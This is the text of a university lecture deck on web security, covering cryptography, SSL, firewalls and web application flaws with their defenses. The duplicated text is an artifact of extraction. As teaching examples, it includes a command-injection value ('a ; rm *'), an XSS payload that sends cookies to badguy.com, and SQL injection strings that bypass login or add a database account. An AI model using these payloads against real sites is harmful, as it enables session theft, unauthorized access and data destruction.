Post on 22-Dec-2015
11
CS6320 – Web SecurityCS6320 – Web Security
L. GreweL. Grewe
Modified from Modified from http://crypto.stanford.edu/cs155/http://crypto.stanford.edu/cs155/
22
IssuesIssues Authentication, AuthorizationAuthentication, Authorization Protecting your system against hackersProtecting your system against hackers Controlling access to critical dataControlling access to critical data Control inbound versus outbound trafficControl inbound versus outbound traffic security versus accessibility tradeoffssecurity versus accessibility tradeoffs security versus capability tradeoffssecurity versus capability tradeoffs multi-tier versus single-tier solutions multi-tier versus single-tier solutions security versus expense tradeoffssecurity versus expense tradeoffs
security and capability versus administrative security and capability versus administrative overhead and complexityoverhead and complexity
33
SolutionsSolutions
Software-based Software-based Hardware-based Hardware-based Freeware versus Commercial Products Freeware versus Commercial Products Use of Security Protocols Use of Security Protocols Cryptography
• Converting messages to unreadable forms...and back
Steganography• Hiding the existence of a message
44
One issue….buffer overflow…things One issue….buffer overflow…things getting bettergetting better
0
5
10
15
20
25
2001 2002 2003 2004 2005 2006
Web (XSS) Buffer Overflow
Source: MITRE CVE trends
Majority of vulnerabilities now found in web software
55
Example Web Site architecture w/ Example Web Site architecture w/ Security ComponentsSecurity Components
IntrusionDetection
System
ApplicationFirewall(WAF)
Fire
wall
LoadBalancer DB
WS1
WS2
WS3
Fire
wall
Authorization
AppServers
66
Attacks of systemsAttacks of systems
Common web-site attacks:Common web-site attacks:
• Denial of ServiceDenial of Service
• Attack the web server (IIS, Apache) :Attack the web server (IIS, Apache) : e.g. control hijacking: CodeRed, Nimda, … e.g. control hijacking: CodeRed, Nimda, … Solutions:Solutions:
• Harden web server: stackguard, libsafe, …Harden web server: stackguard, libsafe, …• Worm defense:Worm defense:
Host based intrusion detection,Host based intrusion detection, Worm signatures generation, shields.Worm signatures generation, shields.
77
FirewallsFirewalls
• A system designed to prevent unauthorized A system designed to prevent unauthorized access to or from a private network. Firewalls access to or from a private network. Firewalls can be implemented in both hardware and can be implemented in both hardware and software, or a combination of bothsoftware, or a combination of both
IP filtering (packet filtering)IP filtering (packet filtering) • = controls access by solely looking at information = controls access by solely looking at information
contained in the IP header of data packets being sent contained in the IP header of data packets being sent to the server. to the server.
Proxy Servers/Application FirewallsProxy Servers/Application Firewalls
88
Web Application FirewallsWeb Application Firewalls
• Prevent some attacks such as:Prevent some attacks such as:• SQL InjectionSQL Injection• Form field tamperingForm field tampering• Cookie poisoningCookie poisoning
Some examplesSome examples::• Imperva Imperva • Kavado InterdoKavado Interdo• F5 TrafficShieldF5 TrafficShield• Citrix NetScaler Citrix NetScaler • CheckPoint Web Intelligence CheckPoint Web Intelligence
99
Message/Information HidingMessage/Information Hiding
Protect some information being sent Protect some information being sent from client to server and vice-versa.from client to server and vice-versa.
Through encryption.Through encryption. Some protocols such as Some protocols such as SSLSSL (secure (secure
socket layer) using encryption to socket layer) using encryption to perform “secure” exchange of perform “secure” exchange of information.information.
1010
EncryptionEncryption
Convert normal, readable data into obscured, unreadable data
Hi There!! Encryption Algorithm m/okuGlilkdskuch
Hi There!! Encryption Algorithm alieka;wk12938*
1111
DecryptionDecryption
Convert obscured, unreadable data into normal, readable data
Hi There!!Decryption Algorithmm/okuGlilkdskuch
Hi There!!Decryption Algorithmalieka;wk12938*
1212
TerminologyTerminology
plaintext - clear readable text ciphertext - unreadable text cipher - algorithm(s) for encryption and
decryption
Hi There!! Encryption Algorithm alieka;wk12938*
Hi There!!Decryption Algorithmalieka;wk12938*
1313
TerminologyTerminology Key -- a secret piece of information that
controls how the encryption algorithm works
Different keys produce different encrypted results
Hi There!! Encryption Algorithm 109291ala;dfwij?
Key: “Citizen Kane”
Hi There!! Encryption Algorithm 398jfasd;k2//ad?
Key: “Citizen Kano”
1414
Symmetric Key TechnologySymmetric Key Technology
Alice wants to send a private/confidential message to Bob
Alice computes c=crypt(message,key)
Sends c to Bob over unsecured wire Bob computes
message=crypt(c,key)
1515
Symmetric Key ApplicationSymmetric Key Application
Password login Alice sends password to computer to
prove identity (authenticity) Problem: Sniffing Solution: Challenge/response
1616
Shared Secret KeyShared Secret Key
Shared secret is great... but how do we distribute it?
1717
Asymmetric Key CryptographyAsymmetric Key Cryptography Instead of one key, have two
• public key• private key
Public key known to everyone and a Private or secret key known only to the recipient of the message.
When John wants to send a secure message to Jane, he uses Jane's public key to encrypt the message. Jane then uses her private key to decrypt it.
Computing private key from public key is very, very difficult (factoring huge number)
1818
Asymmetric Encryption Asymmetric Encryption ExampleExample
John: finds Jane.pub (public key) from her website (or she gives it in an email to John)
John: computes c = crypt(message, Jane.pub)
John: sends c to Jane over unsecured wire
Jane: computes message = crypt(c, Jane.priv)
1919
AdvantagesAdvantages
Key distribution not a problem! Anyone can send a message to Jane Only Jane can decrypt!
2020
Asymmetric Encryption for Asymmetric Encryption for AuthenticationAuthentication
Alice wants to tell Bob the message is really from her!
Digital signature Alice computes c = crypt(message,
Alice.priv) Alice sends c over unsecured wire Anyone can check that Alice is the
sender... by computing message = crypt(c, Alice.pub)
2121
Authenticity + SecrecyAuthenticity + Secrecy
AliceA.priv
A.pub, B.pub, ... BobB.priv
Carl & EveBad People!
“I LUV U”
2222
Authenticity + SecrecyAuthenticity + Secrecy
AliceA.priv
A.pub, B.pub, ... BobB.priv
Carl & EveBad People!
“I LUV U”
B.pub
2323
Authenticity + SecrecyAuthenticity + Secrecy
AliceA.priv
A.pub, B.pub, ... BobB.priv
Carl & EveBad People!
“I LUV U”
B.pub
“This is from A”
2424
Authenticity + SecrecyAuthenticity + Secrecy
AliceA.priv
A.pub, B.pub, ... BobB.priv
Carl & EveBad People!
“I LUV U”
B.pub
“This is from A”
A.priv
2525
Authenticity + SecrecyAuthenticity + Secrecy
AliceA.priv
A.pub, B.pub, ... BobB.priv
Carl & EveBad People!
“I LUV U”
B.pub
“This is from A”
A.priv
2626
Authenticity + SecrecyAuthenticity + Secrecy
AliceA.priv
A.pub, B.pub, ... BobB.priv
Carl & EveBad People!
“I LUV U”
B.pub
“This is from A”
A.priv
2727
Another Solution: Digital Another Solution: Digital CertificatesCertificates
Certificate Authority: publishes that a particular identity goes with a particular public key
Alice gets certificate (identity <=> public key), signed by CA
So if you trust CA, then you can trust the public key
2828
SSL…the ideaSSL…the idea Jane connects to John's server John's server returns
certificate (signed by VeriSign), plus something encrypted w/ John.priv
Jane can verify certificate is valid
Uses public key to decrypt token
John authenticated Jane makes one time session
key k Encrypts w/ John's public key,
sends to John Now, can use symmetric key
cryptography
2929
Attacks…Attacks…
There are many kinds of attacks that There are many kinds of attacks that hackers have donehackers have done
Will mention some more weaknesses Will mention some more weaknesses here ….but, take a class on security, here ….but, take a class on security, cryptography, etc. to get into more cryptography, etc. to get into more details.details.
3030
Attack: Denial of ServiceAttack: Denial of Service
Make the service unavailable Flood of incoming traffic Use robot to launch DOS on server.
Hard to trace identity of attacker. Distributed DOS (DDOS)
• Take over many machines, launch attack simultaneously from many locations
3131
Attack: Buffer OverflowAttack: Buffer Overflow
Bad guy sends a huge, over-sized request to a naïvely implemented (aka buggy) program, overflowing the input buffer
May overwrite data in memory (and/or) program code
May overwrite the return address on the stack of a program in C, so that the procedure call returns somewhere else
3232
How To Avoid Buffer OverflowHow To Avoid Buffer Overflow
Write code carefully Limit input size; read in small chunks
as opposed to reading in whole input Use better languages (e.g. java)
3333
Another Problem >>>>>What about Another Problem >>>>>What about all of the web application code???all of the web application code???
Runs on web server or app server.Runs on web server or app server.• Takes input from web users (via web server)Takes input from web users (via web server)• Interacts with the database and 3Interacts with the database and 3rdrd parties. parties.• Prepares results for users (via web server)Prepares results for users (via web server)
ExamplesExamples: : • Shopping carts, home banking, bill pay, tax Shopping carts, home banking, bill pay, tax
prep, … prep, … • New code written for every web site.New code written for every web site.
Written inWritten in::• C, PHP, Perl, Python, JSP, ASP, …C, PHP, Perl, Python, JSP, ASP, …• Often written with little consideration for Often written with little consideration for
security.security.
3434
Web Application problemsWeb Application problems Inadequate validation of user inputInadequate validation of user input
• Cross site scriptingCross site scripting
• SQL InjectionSQL Injection
• HTTP SplittingHTTP Splitting
Broken session managementBroken session management
• Can lead to session hijacking and data theftCan lead to session hijacking and data theft
Insecure storageInsecure storage
• Sensitive data stored in the clear.Sensitive data stored in the clear.
• Prime target for theft – e.g. egghead, Verizon.Prime target for theft – e.g. egghead, Verizon.
• Note: PCI Data Security Standard (Visa, Mastercard)Note: PCI Data Security Standard (Visa, Mastercard)
3535
A simple exampleA simple example Direct use of user input:Direct use of user input:
http://victim.com/ copy.php ? name=usernamehttp://victim.com/ copy.php ? name=username
copy.php:copy.php:
ProblemProblem: : http://victim.com/ copy.php ? name=“a ; rm *”http://victim.com/ copy.php ? name=“a ; rm *”
(should be: (should be: name=a%20;%20rm%20*name=a%20;%20rm%20* ) )
script name script input
system(“cp temp.dat $name.dat”)
3636
RedirectsRedirects
EZShopper.com shopping cart (10/2004):EZShopper.com shopping cart (10/2004):
http://…/cgi-bin/ loadpage.cgi ? page=urlhttp://…/cgi-bin/ loadpage.cgi ? page=url• Redirects browser to urlRedirects browser to url
Redirects are common on many sitesRedirects are common on many sites• Used to track when user clicks on external linkUsed to track when user clicks on external link• EZShopper uses redirect to add HTTP headersEZShopper uses redirect to add HTTP headers
ProblemProblem: phishing: phishing
http://victim.com/cgi-bin/loadpage ? page=phisher.comhttp://victim.com/cgi-bin/loadpage ? page=phisher.com
• Link to victim.com puts user at phisher.comLink to victim.com puts user at phisher.com
Local redirects should ensure target URL is localLocal redirects should ensure target URL is local
3737
Cross Site Scripting Cross Site Scripting (XSS)(XSS)
3838
The setupThe setup
User input is echoed into HTML response.User input is echoed into HTML response.
ExampleExample: search field: search field
• http://victim.com/search.php ? term = http://victim.com/search.php ? term = appleapple
• search.php responds with:search.php responds with:<HTML> <TITLE> Search Results </TITLE><HTML> <TITLE> Search Results </TITLE>
<BODY><BODY>
Results for <?php echo $_GET[term] ?> :Results for <?php echo $_GET[term] ?> :
. . .. . .
</BODY> </HTML></BODY> </HTML>
Is this exploitable?Is this exploitable?
3939
Answer…..Bad inputAnswer…..Bad input Problem: no validation of input term Problem: no validation of input term
Consider link: (properly URL encoded)Consider link: (properly URL encoded)
http://victim.com/search.php ? term =http://victim.com/search.php ? term =
<script> window.open(<script> window.open(
““http://badguy.com?cookie = http://badguy.com?cookie = ” ” + +
document.cookie ) </script>document.cookie ) </script>
What if user clicks on this linkWhat if user clicks on this link??
1.1. Browser goes to victim.com/search.phpBrowser goes to victim.com/search.php
2.2. Victim.com returnsVictim.com returns
<HTML> Results for <script> … </script><HTML> Results for <script> … </script>
3.3. Browser executes script:Browser executes script: Sends badguy.com cookie for victim.comSends badguy.com cookie for victim.com
4040
What is the problem?What is the problem?
Why would user click on such a link?Why would user click on such a link?• Phishing email in webmail client (e.g. gmail).Phishing email in webmail client (e.g. gmail).
• Link in doubleclick banner adLink in doubleclick banner ad
• … … many many ways to fool user into clickingmany many ways to fool user into clicking
What if badguy.com gets cookie for What if badguy.com gets cookie for victim.com ?victim.com ?• Cookie can include session auth for victim.comCookie can include session auth for victim.com
Or other data intended only for victim.comOr other data intended only for victim.com
Violates same origin policyViolates same origin policy
4141
Worse …Worse …
Attacker can execute arbitrary scripts in browserAttacker can execute arbitrary scripts in browser
Can manipulate any DOM component on victim.comCan manipulate any DOM component on victim.com• Control links on pageControl links on page• Control form fields (e.g. password field) on this Control form fields (e.g. password field) on this
page and linked pages.page and linked pages. Example: inject password field that sends Example: inject password field that sends
password to bad guy.password to bad guy.
Can infect other users: MySpace.com worm.Can infect other users: MySpace.com worm.
4242
MySpace.com MySpace.com (Samy worm)(Samy worm) Users can post HTML on their pagesUsers can post HTML on their pages
• MySpace.com ensures HTML contains noMySpace.com ensures HTML contains no
<script>, <body>, onclick, <a <script>, <body>, onclick, <a href=javascript://>href=javascript://>
• … … but can do Javascript within CSS tags:but can do Javascript within CSS tags:<div <div style=“background:url(‘javascript:alert(1)’)”>style=“background:url(‘javascript:alert(1)’)”>
And can hideAnd can hide ““javascriptjavascript”” asas ““java\nscriptjava\nscript””
With careful javascript hacking:With careful javascript hacking:
• Samy’s worm: infects anyone who visits an infected Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend.MySpace page … and adds Samy as a friend.
• Samy had millions of friends within 24 hours.Samy had millions of friends within 24 hours.
More info: http://namb.la/popular/tech.htmlMore info: http://namb.la/popular/tech.html
4343
Avoiding XSS bugs Avoiding XSS bugs (PHP)(PHP)
Main problem: Main problem: • Input checking is difficult --- many ways to inject scripts Input checking is difficult --- many ways to inject scripts
into HTML.into HTML.
Preprocess input from user before echoing itPreprocess input from user before echoing it
PHP: PHP: htmlspecialcharshtmlspecialchars(string)(string)
& & & " & " " ' " ' ' ' < < < > < > > >
• htmlspecialcharshtmlspecialchars(( "<a href='test'>Test</a>"<a href='test'>Test</a>", ENT_QUOTES); ", ENT_QUOTES);
Outputs: Outputs: <a href='test'>Test</a><a href='test'>Test</a>
4444
httpOnly Cookies httpOnly Cookies (IE)(IE)
BrowserServer
GET …
HTTP Header:Set-cookie: NAME=VALUE ;
HttpOnly
• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
• … but does not stop most other risks of XSS bugs.
4545
SQL InjectionSQL Injection
4646
The setupThe setup User input is used in SQL queryUser input is used in SQL query
Example: login page (in ASP)Example: login page (in ASP)
set ok = execute(“SELECT * FROM UserTableset ok = execute(“SELECT * FROM UserTable
WHERE username=WHERE username=′ ′ ”” & form(“user”) & & form(“user”) &
“ ′ “ ′ AND password=′ AND password=′ ”” & form(“pwd”) & “ ′ & form(“pwd”) & “ ′ ”” ); );
If not ok.EOF If not ok.EOF
login success login success
else fail;else fail;
Is this a problem?Is this a problem?
4747
The problem …..Bad inputThe problem …..Bad input Suppose user = “ Suppose user = “ ′′ or 1 = 1 --or 1 = 1 -- ” (URL ” (URL
encoded)encoded)
Then scripts does:Then scripts does:
ok = execute( SELECT … ok = execute( SELECT …
WHERE username= WHERE username= ′′ ′ or 1=1 --′ or 1=1 -- … )… )
• The The ““----”” causes rest of line to be ignored. causes rest of line to be ignored.
• Now ok.EOF is always false.Now ok.EOF is always false.
The bad news: easy login to many sites this way.The bad news: easy login to many sites this way.
4848
Worse…Worse…
Suppose user = Suppose user =
′′ exec cmdshellexec cmdshell
′′net user badguy badpwdnet user badguy badpwd′ ′ / ADD / ADD ----
Then script does:Then script does:
ok = execute( SELECT … ok = execute( SELECT …
WHERE username= WHERE username= ′′ ′ exec …′ exec … ))
If SQL server contextIf SQL server context runs as “sa”, attacker gets runs as “sa”, attacker gets account on DB server.account on DB server.
4949
Avoiding SQL injectionAvoiding SQL injection Build SQL queries by properly escaping args: Build SQL queries by properly escaping args: ′ ′ \′ \′
Example: Parameterized SQL: (ASP.NET 1.1)Example: Parameterized SQL: (ASP.NET 1.1)• Ensures SQL arguments are properly escaped.Ensures SQL arguments are properly escaped.
SqlCommand cmd = new SqlCommand( SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE "SELECT * FROM UserTable WHERE username = @User AND username = @User AND password = @Pwd", dbConnection); password = @Pwd", dbConnection);
cmd.Parameters.Add("@User", Request[“user”] ); cmd.Parameters.Add("@User", Request[“user”] );
cmd.Parameters.Add("@Pwd", Request[“pwd”] ); cmd.Parameters.Add("@Pwd", Request[“pwd”] );
cmd.ExecuteReader(); cmd.ExecuteReader();
In PHP: bound parameters -- similar functionIn PHP: bound parameters -- similar function
5555
App codeApp code Little programming knowledge can be dangerous:Little programming knowledge can be dangerous:
• Cross site scriptingCross site scripting• SQL InjectionSQL Injection• HTTP SplittingHTTP Splitting
What to do?What to do?
• Band-aid: Web App Firewall (WAF)Band-aid: Web App Firewall (WAF) Looks for attack patterns and blocks requestsLooks for attack patterns and blocks requests False positive / false negativesFalse positive / false negatives
• Code checkingCode checking
5656
Code checkingCode checking Blackbox security testing services:Blackbox security testing services:
• Whitehatsec.comWhitehatsec.com
Automated blackbox testing tools:Automated blackbox testing tools:• Cenzic, Cenzic, HailstormHailstorm• Spidynamic, Spidynamic, WebInspectWebInspect• eEye, eEye, RetinaRetina
Web application hardening tools:Web application hardening tools:• WebSSARI [WWW’04] : based on information flowWebSSARI [WWW’04] : based on information flow• Nguyen-Tuong [IFIP’05] : based on taintingNguyen-Tuong [IFIP’05] : based on tainting
5757
Session ManagementSession Management
Cookies, hidden fields, Cookies, hidden fields, and user authenticationand user authentication
5858
Cookie risksCookie risks Danger of storing data on browser Danger of storing data on browser
• User can change valuesUser can change values
Silly exampleSilly example: Shopping cart software.: Shopping cart software.
Set-cookie:Set-cookie: shopping-cart-total = 150shopping-cart-total = 150 ($) ($)
• User edits cookie file (cookie poisoning):User edits cookie file (cookie poisoning):
Cookie:Cookie: shopping-cart-total = 15shopping-cart-total = 15 ($) ($)
• … … bargain shopping.bargain shopping.
Similar behavior with hidden fields:Similar behavior with hidden fields:
<INPUT TYPE=“hidden” NAME=price VALUE=“150”><INPUT TYPE=“hidden” NAME=price VALUE=“150”>
5959
Not so silly …some real sites had Not so silly …some real sites had this issuethis issue
D3.COM Pty Ltd: D3.COM Pty Ltd: ShopFactory 5.8ShopFactory 5.8 @Retail Corporation: @Retail Corporation: @Retail@Retail Adgrafix: Adgrafix: Check It OutCheck It Out Baron Consulting Group: Baron Consulting Group: WebSite ToolWebSite Tool ComCity Corporation: ComCity Corporation: SalesCartSalesCart Crested Butte Software: Crested Butte Software: EasyCartEasyCart Dansie.net: Dansie.net: Dansie Shopping CartDansie Shopping Cart Intelligent Vending Systems: Intelligent Vending Systems: IntellivendIntellivend Make-a-Store: Make-a-Store: Make-a-Store OrderPageMake-a-Store OrderPage McMurtrey/Whitaker & Associates: McMurtrey/Whitaker & Associates: Cart32 3.0 Cart32 3.0 pknutsen@nethut.no: pknutsen@nethut.no: CartMan 1.04CartMan 1.04 Rich Media Technologies: Rich Media Technologies: JustAddCommerce 5.0JustAddCommerce 5.0 SmartCart: SmartCart: SmartCartSmartCart Web Express: Web Express: Shoptron 1.2 Shoptron 1.2
6060
SolutionSolution When storing state on browser MAC data When storing state on browser MAC data
using server secret key.using server secret key.
.NET 2.0:.NET 2.0:• System.Web.Configuration.MachineKey System.Web.Configuration.MachineKey
Secret web server key intended for cookie Secret web server key intended for cookie protectionprotection
• HttpCookie HttpCookie cookie = new HttpCookie(cookie = new HttpCookie(namename,, val val); ); HttpCookie HttpCookie encodedCookie =encodedCookie =
HttpSecureCookie.EncodeHttpSecureCookie.Encode (cookie);(cookie);
• HttpSecureCookie.HttpSecureCookie.DeDecodecode (cookie);(cookie);
6161
Cookie authenticationCookie authentication
Browser Web Server Auth server
POST login.cgiUsername & pwd Validate user
auth=valStore val
Set-cookie: auth=val
GET restricted.htmlCookie: auth=val restricted.html
auth=val
YES/NOIf YES, restricted.html
Check val
6262
Weak authenticators: security riskWeak authenticators: security risk
Predictable cookie authenticatorPredictable cookie authenticator• Verizon Wireless - counterVerizon Wireless - counter• Valid user logs in, gets counter, can view Valid user logs in, gets counter, can view
sessions of other users.sessions of other users.
Weak authenticator generation: [Fu et al. ’01]Weak authenticator generation: [Fu et al. ’01]
• WSJ.com:WSJ.com: cookie = cookie = {user, MAC{user, MACkk(user) }(user) }
• Weak MAC exposes Weak MAC exposes KK from few cookies. from few cookies.
Apache Tomcat: generateSessionID()Apache Tomcat: generateSessionID()• MD5(PRNG) … but weak PRNG [GM’05]. MD5(PRNG) … but weak PRNG [GM’05]. • Predictable SessionID’sPredictable SessionID’s